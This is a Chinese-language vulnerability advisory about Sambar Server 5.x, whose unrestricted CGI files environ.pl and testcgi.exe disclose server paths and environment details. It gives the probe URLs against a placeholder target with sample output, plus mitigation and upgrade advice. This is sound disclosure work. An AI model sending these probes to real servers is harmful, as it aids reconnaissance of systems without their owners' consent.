安全研究

安全漏洞
Sambar Server远程信息泄露漏洞

发布日期:2003-03-27
更新日期:2003-04-01

受影响系统:
Sambar Server 5.3b4
Sambar Server 5.2b
Sambar Server 5.2
Sambar Server 5.1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 7207

Sambar Server是运行于Microsoft Windows 9x/ME/NT/2000操作系统上的多线程Web服务器程序。

Sambar服务器包含的几个CGI文件存在漏洞,远程攻击者可以利用这个漏洞获得敏感系统信息。

Sambar cgi-bin目录下的environ.pl和testcgi.exe文件存在信息泄露问题,并且没有任何访问限制,攻击者可以直接请求这两个文件而获得重要的敏感信息,这些信息可能有助于攻击者进一步对系统进行攻击。


<*来源:Gregory Le Bras (gregory.lebras@security-corporation.com
  
  链接:http://www.security-corporation.com/index.php?id=advisories&a=012-FR
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Gregory Le Bras (gregory.lebras@security-corporation.com)提供了如下测试方法:

http://[target]/cgi-bin/environ.pl

--------------

Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:

http://[target]/cgi-bin/testcgi.exe

---------------

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE

----------------------------

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 由于environ.pl和testcgi.exe这两个CGI文件不是必要的,可删除之或去掉其执行权限。

厂商补丁:

Sambar
------
Sambar Server 6.0已经解决该漏洞,我们建议使用此软件的用户升级到最后更新版本:

http://www.sambar.com

浏览次数:3101
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障